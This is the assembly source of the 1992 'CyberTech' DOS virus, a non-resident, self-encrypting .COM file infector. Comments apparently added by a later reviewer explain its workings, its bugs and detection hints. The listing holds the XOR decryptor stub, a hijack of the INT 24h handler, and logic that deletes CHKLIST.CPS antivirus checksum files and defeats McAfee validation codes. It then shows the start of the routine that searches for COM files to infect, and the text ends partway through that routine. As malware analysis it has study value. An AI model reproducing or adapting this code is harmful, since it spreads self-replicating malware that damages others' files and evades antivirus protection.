;
; CyberTech Virus - Strain A John Tardy (C) 1992
;
; Written in A86 V3.22
;
; Description : This is a Non-Resident Self-Encrypting .COM file infector
; which infects COM files in the current directory. It will
; remove CHKLIST.CPS from the current directory after it has
; infected a program. CHKLIST.CPS is a file which is used by
; VDEFEND of PCSHELL and Central Point AntiVirus. When a
; validation code is added by SCAN of McAfee, it will overwrite
; the code, so the file is no longer CRC protected anymore.
; After 1992, the virus activated. It then displays a message
; that your system has been infected. The virus will remove
; itself from the infected file and completely restore it. If
; a validation code was added, it is lost, but the file is not
; corrupted and will function normally. Even when the file is
; compressed afterwards by an executable file compressor, it is
; uncompressed. Before 1993, the virus sometimes displays its
; copyright. This is caused when the random encryption counter
; is a 0. It will redefine it, so there is no visible text in
; the virus. It also checks if there is enough disk space
; available and installs a critical error handler.
;
; Entry stub: these 4 bytes (a 3-byte near Jmp plus the marker) are what
; the infector writes over the head of a host .COM; the bytes they
; replace are kept in OrgPrg (defined past this listing) and copied back
; to CS:100h by Crypt before the host ever runs.
Org 0h ; Generate .BIN file
Start: Jmp MainVir ; Jump to decryptor code at EOF
; NOTE(review): a one-byte marker right after an E9 jump is the only
; infection flag; it is a triage hint at best and too weak to serve as
; a detection signature on its own (many clean files match).
Db '*' ; Virus signature (very short)
;
; Decryptor procedure
;
; Decryptor: the only part of the appended body stored in clear. It runs
; at whatever offset follows the host, so the Call/Pop pair recovers the
; relocation delta in BP; every data reference in the body is written
; as Label[BP] for that reason.
MainVir: Call On1 ; Push offset on stack
On1: Pop BP ; Calculate virus offset
Sub BP,Offset MainVir+3 ; BP = (load address of On1) - (assembled address of On1)
Push Ax ; Save possible error code (AX as DOS set it at .COM entry; presumably popped in Ready, off-page)
Lea Si,Crypt[BP] ; Decrypt the virus with a
Mov Di,Si ; very simple exclusive or
Mov Cx,CryptLen ; function. (CryptLen is defined past this listing)
; In-place XOR over CryptLen bytes starting at Crypt, i.e. the code
; rewrites its own segment -- real-mode DOS has no W^X to object. The
; immediate 0 in "Xor Al,0" is the key byte; the file header describes it
; as set per copy, and a key of 0 leaves the body in clear (the visible
; copyright text the header mentions). The decryptor loop itself is
; constant across copies, which is what detection keys on rather than
; the encrypted body.
Decrypt: Lodsb ;
Xor Al,0 ;
Stosb ;
Loop Decrypt ;
DecrLen Equ $-MainVir ; Length of the decryptor
;
; Main initialization procedure
;
; Body proper (stored XOR-encrypted, decrypted by MainVir). Puts the
; host's original first 4 bytes back at CS:100h, hooks INT 24h, then runs
; three gates (DOS major version, free clusters, year) before branching to
; the disinfect path (Clean) or the infect path (NoClean). OrgPrg,
; OldInt24, NewInt24 and Ready are defined past this listing.
Crypt: Mov Ax,Cs:OrgPrg[BP] ; Store begin of host at
Mov Bx,Cs:OrgPrg[BP]+2 ; cs:100h (begin of com)
Mov Cs:Start+100h,Ax ; Start is 0, so this is CS:100h / CS:102h:
Mov Cs:Start[2]+100h,Bx ; the Jmp+'*' stub is undone in memory
Xor Ax,Ax ; Get original interrupt 24
Push Ax ; (critical error handler)
Pop Ds ; DS = 0 -> interrupt vector table
Mov Bx,Ds:[4*24h] ; offset word of the INT 24h vector (0:90h)
; NOTE(review): the next line reads 0:94h (4*24h+4), which is the offset
; word of the INT 25h entry, not the INT 24h segment word at 0:92h; the
; install sequence below writes the segment at +2. OldInt24 therefore
; does not hold a consistent far pointer, so whatever Ready (off-page)
; restores from it is suspect -- an INT 24h entry left pointing into the
; wrong segment after the program exits would be a symptom of that.
Mov Es,Ds:[4*24h]+4 ;
Mov Word Ptr Cs:OldInt24[Bp],Bx ; And store it on a save place
Mov Word Ptr Cs:OldInt24+2[Bp],Es ;
; Install NewInt24 (off-page) as the critical error handler. Per the
; author's comment this suppresses the DOS "Abort, Retry, Fail?" prompt
; on write-protected or absent media during the file work that follows;
; the two word writes are not bracketed by Cli/Sti, so the vector is
; briefly half-updated.
Lea Bx,NewInt24[Bp] ; Install own critical error
Push Cs ; handler to avoid messages
Pop Es ; when a disk is write
Mov Word Ptr Ds:[4*24h],Bx ; protected and such things
Mov Word Ptr Ds:[4*24h]+2,Es ;
Push Cs ;
Pop Ds ; DS = CS again for the remaining DOS calls
Mov Ah,30h ; Check if DOS version is
Int 21h ; 3.0 or above for correct
Cmp Al,3 ; interrupt use (AL = major version)
Jae On2 ;
Jmp Ready ; older DOS: do nothing, run the host
; INT 21h/AH=36h with DL=0 -> default drive; BX = free clusters on
; return. "Ja" requires BX > 3, i.e. at least four free clusters, one
; more than the comment says. The AX=0FFFFh (invalid drive) error return
; is not checked, and BX is not meaningful in that case.
On2: Mov Ax,3600h ; Check if enough disk space
Xor Dx,Dx ; is available for infecting
Int 21h ; (3 clusters should be
Cmp Bx,3 ; enough i think)
Ja TestDate ;
Jmp Ready ;
; Trigger gate: INT 21h/AH=2Ah returns the year in CX. From 1993 on the
; code only ever disinfects; before that it infects. Which path runs
; depends solely on the system clock, which matters when reproducing
; either behaviour under analysis.
TestDate: Mov Ah,2ah ; Check if 1992 is past time
Int 21h ; already
Cmp Cx,1993 ;
Jae Clean ; - 1993 or more
Jmp NoClean ; - Not 1993 or more
;
; Main Cleanup procedure
;
; Disinfect path (year >= 1993). Rewrites the currently running program
; from its own memory image at CS:100h, so the file comes back at its
; pre-infection length with date/time and attributes put back. The
; message text Removed and the Ready routine are defined past this
; listing.
Clean: Push Cs ; Show message that the
Pop Ds ; system has been infected
Mov Ah,9 ;
Lea Dx,Removed[Bp] ;
Int 21h ;
; Scratch area near the top of the 64K COM segment: DTA at CS:0FD00h,
; the program path at CS:0FD80h. Nothing checks that the segment really
; is that large, and the area sits just under where DOS places a .COM's
; stack -- unguarded, though the stack use here is only a few words.
Mov Ah,1ah ; Move DTA to a safe place
Mov Dx,0fd00h ;
Int 21h ;
; PSP:2Ch holds the environment segment. The environment ends with a
; double NUL followed by the word 0001h and then the program's full path
; (a DOS 3.0+ feature, presumably what the version gate in Crypt is for).
; The scan looks for that 01h byte; if none turns up within 4000h bytes
; the code falls through into On3 anyway and copies whatever SI then
; points at.
Mov Ax,Cs:[2ch] ; Find the name of the
Mov Ds,Ax ; program that is now
Mov Si,0 ; executed (we must search in
Mov Cx,4000h ; the DOS environment for
Seeker: Lodsb ; safe tracking of the name
Cmp Al,1 ;
Je On3 ;
Loop Seeker ;
; Copy a fixed 80h bytes of the path to CS:0FD80h. The loop does not
; stop at the terminating NUL (it is copied along with what follows),
; and "Xor Ax,Ax" only clears AH, which nothing reads -- AL is already
; 0 on that branch. A path of 80h bytes or more would be stored without
; its terminator.
On3: Inc Si ; skip the 00 of the 0001h word
Push Cs ; to a safe address in memory
Pop Es ;
Mov Di,0fd80h ;
Mov Cx,80h ;
Trans: Lodsb ;
Cmp Al,0h ;
Jne Verder ;
Xor Ax,Ax ;
Verder: Stosb ;
Loop Trans ;
; INT 21h/AX=4300h: CX = attributes of the file named at DS:DX. This is
; the only file call on this path whose error return is checked.
Push Cs ; Read file attributes and
Pop Ds ; check if an error has
Mov Ax,4300h ; occured
Mov Dx,0fd80h ;
Int 21h ;
Jnc DeInfect ; - No error, DeInfect
Jmp Ready ; - Error, Ready
; Clear attributes so a read-only file can be truncated and rewritten.
DeInfect: Push Cx ; Store old file attributes
Mov Ax,4301h ; Clear file attributes
Xor Cx,Cx ; (for read only etc.)
Int 21h ;
; NOTE(review): the open (3D02h) has no CF check; on failure AX holds an
; error code that is then used as a handle by 5700h and 3Eh.
Mov Ax,3d02h ; Open the file
Int 21h ;
Mov Bx,Ax ; Read file date/time stamp
Mov Ax,5700h ; and store it on the stack
Int 21h ; for later use
Push Cx ;
Push Dx ;
Mov Ah,3eh ; Close file
Int 21h ;
; INT 21h/AH=3Ch on an existing name truncates it to zero length; the
; host is then written back from memory. The length BP-0FCh is the
; host's original size (BP was derived in MainVir from where the body
; landed after the host; this holds if the entry Jmp assembles to 3
; bytes). Because the write source is the in-memory image, a host that
; was packed after infection is written back unpacked, as the file
; header states. The write's return (CF / bytes written in AX) is not
; checked, so a short write leaves a truncated host.
Mov Dx,0fd80h ; Create a new file with the
Xor Cx,Cx ; same name
Mov Ah,3ch ;
Int 21h ;
Mov Bx,Ax ; store file handle in BX
Mov Ah,40h ; write memory image of host
Mov Dx,100h ; program to file (the original
Mov Cx,Bp ; file is now back again)
Sub Cx,0fch ;
Int 21h ;
; Forensic caveat: the original date/time and attributes are put back,
; so the last-modified time is not an indicator of the clean-up; the
; change in file size is.
Pop Dx ; restore file date/time
Pop Cx ; stamp
Mov Ax,5701h ;
Int 21h ;
Mov Ah,3eh ; close file
Int 21h ;
Pop Cx ; restore file attributes
Mov Ax,4301h ;
Mov Dx,0fd80h ;
Int 21h ;
Push Cs ; jump to ready routine
Pop Ds ; (shutdown of the virus)
Jmp Ready ;
;
; Main viral part
;
NoClean: Mov Ah,1ah ; Store DTA at safe place
Mov Dx,0fd00h ;
Int 21h ;
Mov Ah,4eh ; FindFirsFile Function
Search: Lea Dx,FileSpec[BP] ; Search for filespec given
Xor Cx,Cx ; in FileSpec adress
Int 21h ;
Jnc Found ; Found - Found
Jmp Ready ; Not Found - Ready
Found: Mov Ax,4300h ; Get file attributes and
Mov Dx,0fd1eh ; store them on the stack
Int 21h ;
Push Cx ;
Mov Ax,4301h ; clear file attributes
Xor Cx,Cx ;
Int 21h ;